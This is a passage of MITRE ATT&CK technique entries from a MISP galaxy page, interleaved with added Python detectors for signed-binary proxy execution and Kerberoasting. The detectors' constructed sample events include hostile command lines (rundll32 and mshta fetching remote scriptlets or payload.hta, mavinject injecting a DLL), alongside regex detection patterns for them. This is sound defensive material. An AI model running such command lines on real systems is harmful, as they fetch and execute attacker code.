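The Rundll32 (T1218.011 and T1085), Verclsid, Mavinject, MMC and Mshta entries above share one detection story: a signed, native binary whose command line reveals the abuse. The following is an added example, not code from the MISP galaxy or from ATT&CK, that runs the command-line patterns quoted in those entries over constructed process-creation records shaped like Sysmon event 1 (<code>Image</code>, <code>CommandLine</code>, <code>OriginalFileName</code>). Matching on the PE's original file name rather than the on-disk name means a renamed copy (the Masquerading case the Rundll32 entry mentions) is still checked against the right rules. Hits are leads to review, not verdicts; several of these switches also appear in legitimate administration.

```python
"""Command-line triage for signed-binary proxy execution.

Added example (not part of the MISP galaxy or of ATT&CK) for the Rundll32,
Verclsid, Mavinject, MMC and Mshta entries. Records are constructed; patterns
come from the command lines quoted in those entries.
"""
import re

# (original binary name, description, pattern)
RULES = [
    ("rundll32", "javascript:/vbscript: protocol handler (Poweliks-style)",
     re.compile(r"\b(?:java|vb)script:", re.I)),
    ("rundll32", "export called by ordinal", re.compile(r",\s*#\d+\b")),
    ("rundll32", "Control_RunDLL loading a .cpl", re.compile(r"Control_RunDLL(?:AsUser)?\b", re.I)),
    ("verclsid", "/S /C with a CLSID", re.compile(r"/S\s+/C\s+\{[0-9A-F-]{36}\}", re.I)),
    ("mavinject", "DLL injection into a running PID", re.compile(r"/INJECTRUNNING\b", re.I)),
    ("mavinject", "import descriptor injection", re.compile(r"/HMODULE=", re.I)),
    ("mmc", ".msc launched with -Embedding", re.compile(r"-Embedding\b", re.I)),
    ("mmc", "backup catalog deletion", re.compile(r"wbadmin\.msc\s+delete\s+catalog", re.I)),
    ("mshta", "inline script or remote .hta", re.compile(r"(?:java|vb)script:|https?://", re.I)),
]

SAMPLE_EVENTS = [  # constructed process-creation records
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();'
                    r'GetObject("script:https://www.example.com/malicious.sct")'},
    {"Image": r"C:\Windows\System32\verclsid.exe", "OriginalFileName": "verclsid.exe",
     "CommandLine": "verclsid.exe /S /C {00000000-0000-0000-0000-000000000000}"},
    {"Image": r"C:\Windows\System32\mavinject.exe", "OriginalFileName": "mavinject.exe",
     "CommandLine": r"C:\Windows\system32\mavinject.exe 4242 /INJECTRUNNING C:\Users\Public\evil.dll"},
    {"Image": r"C:\Windows\System32\mmc.exe", "OriginalFileName": "mmc.exe",
     "CommandLine": r"mmc.exe -Embedding C:\path\to\test.msc"},
    {"Image": r"C:\Windows\System32\mmc.exe", "OriginalFileName": "mmc.exe",
     "CommandLine": "mmc gpedit.msc"},                                   # benign admin use
    {"Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": "mshta http://webserver/payload.hta"},
    {"Image": r"C:\Users\Public\svchost.exe", "OriginalFileName": "RUNDLL32.EXE",  # renamed copy
     "CommandLine": r"svchost.exe C:\Users\Public\x.dll,#2"},
]


def _base(name):
    """'C:\\x\\RUNDLL32.EXE' -> 'rundll32'."""
    return name.rsplit("\\", 1)[-1].lower().removesuffix(".exe")


def triage(event):
    """Return the list of findings for one process-creation event."""
    findings = []
    image = _base(event["Image"])
    original = _base(event.get("OriginalFileName") or event["Image"])
    if original != image:
        findings.append(f"renamed copy of {original}.exe running as {image}.exe")
    cmd = event["CommandLine"]
    for binary, desc, rx in RULES:
        if binary == original and rx.search(cmd):
            findings.append(f"{binary}: {desc}")
    return findings


def triage_all(events):
    return [triage(e) for e in events]


if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, triage_all(SAMPLE_EVENTS)):
        print(ev["CommandLine"][:60], "->", hits or "clean")
```

The rules are deliberately narrow; in a real pipeline each hit would be joined with parent process, signer and network data before escalation, and <code>Control_RunDLL</code> in particular needs an allowlist of the stock <code>.cpl</code> files.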

Hypervisor - T1062

This technique has been deprecated and should no longer be used.

A type-1 hypervisor is a software layer that sits between the guest operating systems and system’s hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.

The tag is: misp-galaxy:mitre-attack-pattern="Hypervisor - T1062"

Table 6415. Table References

Links

http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.90.8832&rep=rep1&type=pdf

http://en.wikipedia.org/wiki/Xen

http://virtualization.info/en/news/2006/08/debunking-blue-pill-myth.html

https://attack.mitre.org/techniques/T1062

https://capec.mitre.org/data/definitions/552.html

https://en.wikipedia.org/wiki/Hypervisor

Kerberoasting - T1208

Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service (Citation: Microsoft Detecting Kerberoasting Feb 2018)). (Citation: Microsoft SPN) (Citation: Microsoft SetSPN) (Citation: SANS Attacking Kerberos Nov 2014) (Citation: Harmj0y Kerberoast Nov 2016)

Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). (Citation: Empire InvokeKerberoast Oct 2016) (Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm (Kerberos 5 TGS-REP etype 23), in which case the encryption key is derived directly from the NT hash of the password of the service account associated with the SPN; the ticket can therefore be subjected to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks against that password, which may expose plaintext credentials. (Citation: AdSecurity Cracking Kerberos Dec 2015) (Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)

This same attack could be executed using service tickets captured from network traffic. (Citation: AdSecurity Cracking Kerberos Dec 2015)

Cracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078). (Citation: SANS Attacking Kerberos Nov 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1208"

Table 6416. Table References

Links

https://adsecurity.org/?p=2293

https://attack.mitre.org/techniques/T1208

https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/

https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1

https://msdn.microsoft.com/library/ms677949.aspx

https://redsiege.com/kerberoast-slides

https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx

https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
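On the defending side, the request described above is visible on the domain controller as Security event 4769 (a service ticket was requested) with <code>TicketEncryptionType</code> <code>0x17</code>, i.e. RC4-HMAC, etype 23. The following is an added example, not code from the MISP galaxy or from ATT&CK, that runs a simple Kerberoasting heuristic over constructed 4769 records: RC4 tickets for non-computer service accounts, many distinct SPN accounts from one requester in a short window. Field names match the 4769 event; the threshold and window are assumptions to tune per environment.

```python
"""Kerberoasting detection over Windows Security event 4769 records.

Added example for the Kerberoasting entry (not part of the MISP galaxy or of
ATT&CK). Records are constructed; TargetUserName is the requester,
ServiceName the account owning the SPN, TicketEncryptionType 0x17 = RC4-HMAC
(etype 23). Thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"

SAMPLE_4769 = [  # constructed
    {"TimeCreated": "2024-05-01T10:00:05", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TimeCreated": "2024-05-01T10:00:07", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TimeCreated": "2024-05-01T10:00:09", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TimeCreated": "2024-05-01T10:00:10", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "WS01$", "TicketEncryptionType": "0x17", "Status": "0x0"},   # machine account
    {"TimeCreated": "2024-05-01T10:01:00", "TargetUserName": "asmith@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12", "Status": "0x0"},  # AES256, normal
    {"TimeCreated": "2024-05-01T10:01:30", "TargetUserName": "asmith@CORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TimeCreated": "2024-05-01T10:02:00", "TargetUserName": "bob@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "Status": "0x0"},  # one legacy request
]


def is_roast_candidate(ev):
    """RC4 service ticket for a user-type service account, successfully issued.

    Computer accounts (trailing '$') and krbtgt are excluded: their keys are
    long random passwords that offline cracking will not recover.
    """
    svc = ev["ServiceName"]
    return (ev.get("Status", "0x0") == "0x0"
            and ev["TicketEncryptionType"].lower() == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def rc4_requests(events):
    return [ev for ev in events if is_roast_candidate(ev)]


def kerberoast_suspects(events, min_distinct_spns=3, window=timedelta(minutes=5)):
    """Requesters who pulled RC4 tickets for >= min_distinct_spns different
    service accounts inside `window`. Returns {requester: sorted SPN accounts}."""
    per_user = defaultdict(list)
    for ev in rc4_requests(events):
        per_user[ev["TargetUserName"]].append(
            (datetime.fromisoformat(ev["TimeCreated"]), ev["ServiceName"]))
    suspects = {}
    for user, reqs in per_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):          # sliding window from each request
            spns = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(spns) >= min_distinct_spns:
                suspects[user] = sorted(spns)
                break
    return suspects


if __name__ == "__main__":
    print(kerberoast_suspects(SAMPLE_4769))
```

Service accounts whose <code>msDS-SupportedEncryptionTypes</code> still permits only RC4 will produce <code>0x17</code> tickets legitimately, so the per-service baseline matters more than any single event; the requester-side burst is the part that is hard for an attacker to avoid.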

Masquerading - T1036

Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.

Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site) Masquerading may also include the use of [Proxy](https://attack.mitre.org/techniques/T1090) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections.

The tag is: misp-galaxy:mitre-attack-pattern="Masquerading - T1036"

Table 6417. Table References

Links

https://attack.mitre.org/techniques/T1036

https://lolbas-project.github.io/

https://twitter.com/ItsReallyNick/status/1055321652777619457

https://www.elastic.co/blog/how-hunt-masquerade-ball

Scripting - T1064

This technique has been deprecated. Please use [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts.

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Scripting - T1064"

Table 6418. Table References

Links

http://www.metasploit.com

https://attack.mitre.org/techniques/T1064

https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/

https://github.com/mattifestation/PowerSploit

https://www.uperesia.com/analyzing-malicious-office-documents

https://www.veil-framework.com/framework/

Phishing - T1660

Adversaries may send malicious content to users in order to gain access to their mobile devices. All forms of phishing are electronically delivered social engineering. Adversaries can conduct both non-targeted phishing, such as in mass malware spam campaigns, as well as more targeted phishing tailored for a specific individual, company, or industry, known as “spearphishing”. Phishing often involves social engineering techniques, such as posing as a trusted source, as well as evasion techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages.

Mobile phishing may take various forms. For example, adversaries may send emails containing malicious attachments or links, typically to deliver and then execute malicious code on victim devices. Phishing may also be conducted via third-party services, like social media platforms.

Mobile devices are a particularly attractive target for adversaries executing phishing campaigns. Because of their smaller form factor compared with traditional desktop endpoints, users may not be able to notice minor differences between genuine and phishing websites. Further, mobile devices have additional sensors and radios that allow adversaries to execute phishing attempts over several different vectors, such as:

  • SMS messages: Adversaries may send SMS messages (known as “smishing”) from compromised devices to potential targets to convince the target to, for example, install malware, navigate to a specific website, or enable certain insecure configurations on their device.

  • Quick Response (QR) Codes: Adversaries may use QR codes (known as “quishing”) to redirect users to a phishing website. For example, an adversary could replace a legitimate public QR Code with one that leads to a different destination, such as a phishing website. A malicious QR code could also be delivered via other means, such as SMS or email. In the latter case, an adversary could utilize a malicious QR code in an email to pivot from the user’s desktop computer to their mobile device.

  • Phone Calls: Adversaries may call victims (known as “vishing”) to persuade them to perform an action, such as providing login credentials or navigating to a malicious website. This could also be used as a technique to perform the initial access on a mobile device, but then pivot to a computer/other network by having the victim perform an action on a desktop computer.

The tag is: misp-galaxy:mitre-attack-pattern="Phishing - T1660"

Table 6419. Table References

Links

https://attack.mitre.org/techniques/T1660

https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html

Bootkit - T1067

A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016)

Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.

Master Boot Record

The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)

Volume Boot Record

The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.

The tag is: misp-galaxy:mitre-attack-pattern="Bootkit - T1067"

Table 6420. Table References

Links

http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion

https://attack.mitre.org/techniques/T1067

https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf

PowerShell - T1086

PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

Administrator permissions are required to use PowerShell to connect to remote systems.

A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)

PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell’s underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)

The tag is: misp-galaxy:mitre-attack-pattern="PowerShell - T1086"

Table 6421. Table References

Links

http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf

http://www.sixdub.net/?p=367

https://attack.mitre.org/techniques/T1086

https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/

https://github.com/jaredhaight/PSAttack

https://github.com/mattifestation/PowerSploit

https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/

https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx

https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html

Timestomp - T1099

Adversaries may take actions to hide the deployment of new, or modification of existing files to obfuscate their activities. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)

The tag is: misp-galaxy:mitre-attack-pattern="Timestomp - T1099"

Table 6422. Table References

Links

http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html

https://attack.mitre.org/techniques/T1099

Regsvr32 - T1117

Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)

Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.

Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)

Regsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1122). (Citation: Carbon Black Squiblydoo Apr 2016)

The tag is: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1117"

Table 6423. Table References

Links

https://attack.mitre.org/techniques/T1117

https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/

https://support.microsoft.com/en-us/kb/249873

https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/

https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html

InstallUtil - T1118

InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>. InstallUtil.exe is digitally signed by Microsoft.

Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute <code>[System.ComponentModel.RunInstaller(true)]</code>. (Citation: LOLBAS Installutil)

The tag is: misp-galaxy:mitre-attack-pattern="InstallUtil - T1118"

Table 6424. Table References

Links

https://attack.mitre.org/techniques/T1118

https://lolbas-project.github.io/lolbas/Binaries/Installutil/

https://msdn.microsoft.com/en-us/library/50614e95.aspx

CMSTP - T1191

The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.

Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1117) / “Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.

CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)

The tag is: misp-galaxy:mitre-attack-pattern="CMSTP - T1191"

Table 6425. Table References

Links

http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/

https://attack.mitre.org/techniques/T1191

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)

https://github.com/api0cradle/UltimateAppLockerByPassList

https://msitpros.com/?p=3960

https://twitter.com/ItsReallyNick/status/958789644165894146

https://twitter.com/NickTyrer/status/958450014111633408

Keychain - T1142

Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in <code>~/Library/Keychains/</code>, <code>/Library/Keychains/</code>, and <code>/Network/Library/Keychains/</code>. (Citation: Wikipedia keychain) The <code>security</code> command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.

To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.

The tag is: misp-galaxy:mitre-attack-pattern="Keychain - T1142"

Table 6426. Table References

Links

http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way

https://attack.mitre.org/techniques/T1142

https://en.wikipedia.org/wiki/Keychain_(software)

Launchctl - T1152

Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made (Citation: Sofacy Komplex Trojan). Running a command from launchctl is as simple as <code>launchctl submit -l <labelName> -- /Path/to/thing/to/execute "arg" "arg" "arg"</code>. Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges.

Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.

The tag is: misp-galaxy:mitre-attack-pattern="Launchctl - T1152"

Table 6427. Table References

Links

https://attack.mitre.org/techniques/T1152

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

Source - T1153

This technique has been deprecated and should no longer be used.

The <code>source</code> command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways: <code>source /path/to/filename [arguments]</code> or <code>. /path/to/filename [arguments]</code>. Take note of the space after the ".". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell’s environment.(Citation: Source Manual)

Adversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.

The tag is: misp-galaxy:mitre-attack-pattern="Source - T1153"

Table 6428. Table References

Links

https://attack.mitre.org/techniques/T1153

https://ss64.com/bash/source.html

Trap - T1154

The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format <code>trap 'command list' signals</code> where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)

The tag is: misp-galaxy:mitre-attack-pattern="Trap - T1154"

Table 6429. Table References

Links

https://attack.mitre.org/techniques/T1154

https://bash.cyberciti.biz/guide/Trap_statement

https://ss64.com/bash/trap.html

HISTCONTROL - T1148

The <code>HISTCONTROL</code> environment variable keeps track of what should be saved by the <code>history</code> command and eventually into the <code>~/.bash_history</code> file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". <code>HISTCONTROL</code> can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. <code>HISTCONTROL</code> does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.

The tag is: misp-galaxy:mitre-attack-pattern="HISTCONTROL - T1148"

Table 6430. Table References

Links

https://attack.mitre.org/techniques/T1148

https://capec.mitre.org/data/definitions/13.html

Defacement - T1491

Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages.

The tag is: misp-galaxy:mitre-attack-pattern="Defacement - T1491"

Table 6431. Table References

Links

https://attack.mitre.org/techniques/T1491

AppleScript - T1155

macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the <code>osalang</code> program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.

Adversaries can use this to interact with open SSH connections, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they’re already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well, such as a reverse shell via python (Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via <code>osascript /path/to/script</code> or <code>osascript -e "script here"</code>.

The tag is: misp-galaxy:mitre-attack-pattern="AppleScript - T1155"

Table 6432. Table References

Links

https://attack.mitre.org/techniques/T1155

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/

Geofencing - T1581

Adversaries may use a device’s geographical location to limit certain malicious behaviors. For example, malware operators may limit the distribution of a second stage payload to certain geographic regions.(Citation: Lookout eSurv)

[Geofencing](https://attack.mitre.org/techniques/T1581) is accomplished by persuading the user to grant the application permission to access location services. The application can then collect, process, and exfiltrate the device’s location to perform location-based actions, such as ceasing malicious behavior or showing region-specific advertisements.

One method to accomplish [Geofencing](https://attack.mitre.org/techniques/T1581) on Android is to use the built-in Geofencing API to automatically trigger certain behaviors when the device enters or exits a specified radius around a geographical location. Similar to other [Geofencing](https://attack.mitre.org/techniques/T1581) methods, this requires that the user has granted the ACCESS_FINE_LOCATION and ACCESS_BACKGROUND_LOCATION permissions. The latter is only required if the application targets Android 10 (API level 29) or higher. However, Android 11 introduced additional permission controls that may restrict background location collection based on user permission choices at runtime. These additional controls include “Allow only while using the app”, which will effectively prohibit background location collection.(Citation: Android Geofencing API)

Similarly, on iOS, developers can use built-in APIs to set up and execute geofencing. Depending on the use case, the app will need to call either requestWhenInUseAuthorization() or requestAlwaysAuthorization(), depending on when access to the location services is required. Similar to Android, users also have the option to limit when the application can access the device’s location, including one-time use and only when the application is running in the foreground.(Citation: Apple Location Services)

[Geofencing](https://attack.mitre.org/techniques/T1581) can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. For example, location data could be used to limit malware spread and/or capabilities, which could also potentially evade application analysis environments (ex: malware analysis outside of the target geographic area). Other malicious usages could include showing language-specific [Input Prompt](https://attack.mitre.org/techniques/T1411)s and/or advertisements.

The tag is: misp-galaxy:mitre-attack-pattern="Geofencing - T1581"

Table 6433. Table References

Links

https://attack.mitre.org/techniques/T1581

https://blog.lookout.com/esurv-research

https://developer.android.com/training/location/geofencing

https://developer.apple.com/documentation/corelocation/requesting_authorization_for_location_services

Emond - T1519

Adversaries may use Event Monitor Daemon (emond) to establish persistence by scheduling malicious commands to run on predictable event triggers. Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1160) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place. The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1160) configuration file at <code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)

Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1160) service.
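A defender-side check for the rule files described above, added here as an example (not code from the MISP galaxy page, MITRE ATT&CK or Apple): it parses emond rule plists and lists every rule that runs a command, with the event types that trigger it. The plist key names (name, enabled, eventTypes, actions with type/command/user/arguments) are assumed from Apple's sample rules, and the rule file is constructed for the demo.

```python
"""List emond rules that run commands, for persistence review.

Added defender-side example; not code from the MISP galaxy page, MITRE
ATT&CK or Apple. Parses rule plists of the kind emond loads from
/etc/emond.d/rules/ and reports each RunCommand action with review
flags. Rule keys (name, enabled, eventTypes, actions[] with
type/command/user/arguments) are assumed from Apple's sample rules.
"""
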